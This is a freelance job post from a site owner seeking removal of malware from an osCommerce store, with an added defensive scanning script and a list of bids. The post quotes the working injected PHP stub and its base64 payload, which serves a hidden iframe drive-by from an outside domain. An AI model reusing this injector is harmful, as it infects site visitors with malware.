osCommerce site with Malware

In Progress Posted Sep 27, 2010 Paid on delivery

Hello,

My osCommerce website is infected with hidden malware.

When you log on to my website you see this error:

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home1/ajdreams/public_html/includes/[login to view URL]) in /home1/ajdreams/public_html/includes/functions/[login to view URL] on line 97

When you refresh the page the error disappears, and the following code appears (not always):

^ j•™j¤kSôXJAU(p(QU,o08õP=c„aŸC"Gƒ‚(_/f2{clù~I?”6s˜fi2+4£Ho•oœiAk£¦)ZO\9n]2./ñ÷‚?rOYD |ü*m§Bp’f•=oj(õPAuB‚*PH$€SVg44''=c…1ku&oT~û*.;3sZ &«Ktl2¢–a6'fzHo–?h›E“t¢ü%N1:fTf[\ó,ZnpyQ @RSü*n

I was checking through the files, and some weird code keeps adding itself to [login to view URL] (even when I delete it, it reappears 10 min later):

*/

/**start PHNjcmlwdCBsYW5ndWFnZT0nSmF2YVNjcmlwdCc+ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCc2LjcoXCc8MiA1PSI0Oi8vMy44LjkvIiBiPSIxIiBjPSIxIiBhPSIwIj48LzI+XCcpOycsMTMsMTMsJ3x8aWZyYW1lfHVsdGltYXRlNTh8aHR0cHxzcmN8ZG9jdW1lbnR8d3JpdGV8Y298Y2N8ZnJhbWVib3JkZXJ8d2lkdGh8aGVpZ2h0Jy5zcGxpdCgnfCcpLDAse30pKTs8L3NjcmlwdD4= end**/

$__name = md5($_SERVER['HTTP_HOST']);

$reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)";

if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) {

$date = date("D, j M Y 00:00:00", time()+60*60*24*30);

$cookie = time().".".rand(1111111, 9999999);

$set_js = @setcookie ($__name, $cookie, time()+60*60*24*30);

if(!$set_js)

echo '<script type="text/javascript">[login to view URL] = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>';

$__content = file_get_contents(__FILE__);

preg_match("#\*start(.*?)end\*#is", $__content, $__m);

if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) {

echo base64_decode($__m[1]);

}

elseif(isset($__m[1]) and trim($__m[1])!="") {

echo $__m[1];

}

}

unset ($__name);

Some of my visitors told me that programs are downloaded automatically to their computers. When they use Firefox, their browser crashes.

And on top of it all, when I was checking through my files I noticed an unknown PHP file ([login to view URL]). It's in fact a login portal to somewhere in my website (it had a username and password area; when you click on cancel it sends you to Google Russia), but I've deleted it.

Please bid only if you have experience.

Thanks

JavaScript MySQL OSCommerce PHP Shopping Carts

Project ID: #807567
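
An added example, not part of the original post or any bidder's code: a Python triage script that looks for the `*start ... end*` marker the injected stub above searches for in its own file, decodes the embedded payload for review, and flags files that also carry the stub's traits. The function names, hint lists and sample input are assumptions constructed for illustration.

```python
import base64
import os
import re
# The marker regex mirrors the one the injected stub runs against its own file.
MARKER = re.compile(r"\*start(.*?)end\*", re.I | re.S)
B64 = re.compile(r"^[a-zA-Z0-9/+]*={0,2}$")
# Stub traits: reads itself, decodes the blob, gates on a cookie.
STUB_TRAITS = ("file_get_contents(__FILE__)", "base64_decode(", "$_COOKIE[")
PAYLOAD_HINTS = ("<script", "eval(", "iframe", "document.write")

def scan_php(source):
    """Report marker payloads and stub traits found in one PHP file's text."""
    payloads = []
    for m in MARKER.finditer(source):
        blob = m.group(1).strip()
        encoded, decoded = bool(B64.match(blob)), blob
        if encoded:
            try:
                decoded = base64.b64decode(blob, validate=True).decode("latin-1")
            except ValueError:  # not valid base64: the stub would echo it raw
                encoded = False
        payloads.append({
            "line": source.count("\n", 0, m.start()) + 1, "base64": encoded,
            "hints": [h for h in PAYLOAD_HINTS if h in decoded.lower()],
            "preview": decoded[:60],
        })
    traits = [t for t in STUB_TRAITS if t in source]
    return {"payloads": payloads, "stub_traits": traits,
            "suspicious": bool(payloads) and len(traits) >= 2}

def scan_tree(root):
    """Scan every .php file under root; return {path: report} for flagged files."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    report = scan_php(fh.read())
                if report["suspicious"]:
                    hits[path] = report
    return hits

# Constructed, harmless sample input (not the payload from the post).
_b64 = base64.b64encode(b"<script>eval('/* constructed */')</script>").decode()
SAMPLE = ("<?php\n/**start " + _b64 + " end**/\n"
          "$__content = file_get_contents(__FILE__);\n"
          "echo base64_decode($__m[1]);\n")
CLEAN = "<?php echo 'hello'; ?>\n"
```

Run `scan_tree` on the web root and review each preview before deleting anything. Since the post says the code reappears after deletion, a second run after cleanup shows whether something is still rewriting the files.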

About the project

16 proposals Remote project Active Oct 11, 2010

16 freelancers are bidding on average $89 for this job

WSTIBS

We offer quality solution, time base completion with support. ***** Check PMB ***** Best Regards

$100 USD in 1 day
(137 Reviews)
8.0
Zeldaze

Hi, I'm an experienced osCommerce developer and I have experience in virus removal and future protection. Ready to get started.

$149 USD in 0 days
(329 Reviews)
7.2
eelance

I can fix that for you.

$30 USD in 1 day
(444 Reviews)
7.0
soniamit

Please see pm............ Regards soNia

$150 USD in 2 days
(193 Reviews)
6.6
IceStormz

Please check PM

$50 USD in 0 days
(78 Reviews)
6.2
tuxadmin

Hi, see my profile for security-related issues, thanks. Escrow payment required.

$75 USD in 2 days
(102 Reviews)
6.4
anode

I have fixed similar problems before. Ready to start right away.

$100 USD in 2 days
(136 Reviews)
6.3
ashisha100

Can start immediately, Please check PMB.

$100 USD in 2 days
(50 Reviews)
6.4
devd22

Hi, I am interested in this project. Thanks

$40 USD in 2 days
(212 Reviews)
5.8
ta3k

See your PMB please

$45 USD in 1 day
(48 Reviews)
5.2
ARNLWEB

Expert here, let's get started, thank you.

$61 USD in 7 days
(22 Reviews)
4.5
zeromiletech

Ready to start. Check PMB..

$35 USD in 1 day
(2 Reviews)
1.9
sankalplondon6

Please let me know when we have to start the work for you. We are on Skype; add me as sankalpsaxena7

$35 USD in 1 day
(0 Reviews)
0.0
Kazumasa6769

Hi, kindly check your inbox.

$100 USD in 2 days
(0 Reviews)
0.0
jzm

I have already removed malware of this type in the past week

$250 USD in 3 days
(0 Reviews)
0.0
huzit

Hi, I am ready to get it done for you. Thank you!

$100 USD in 1 day
(0 Reviews)
0.0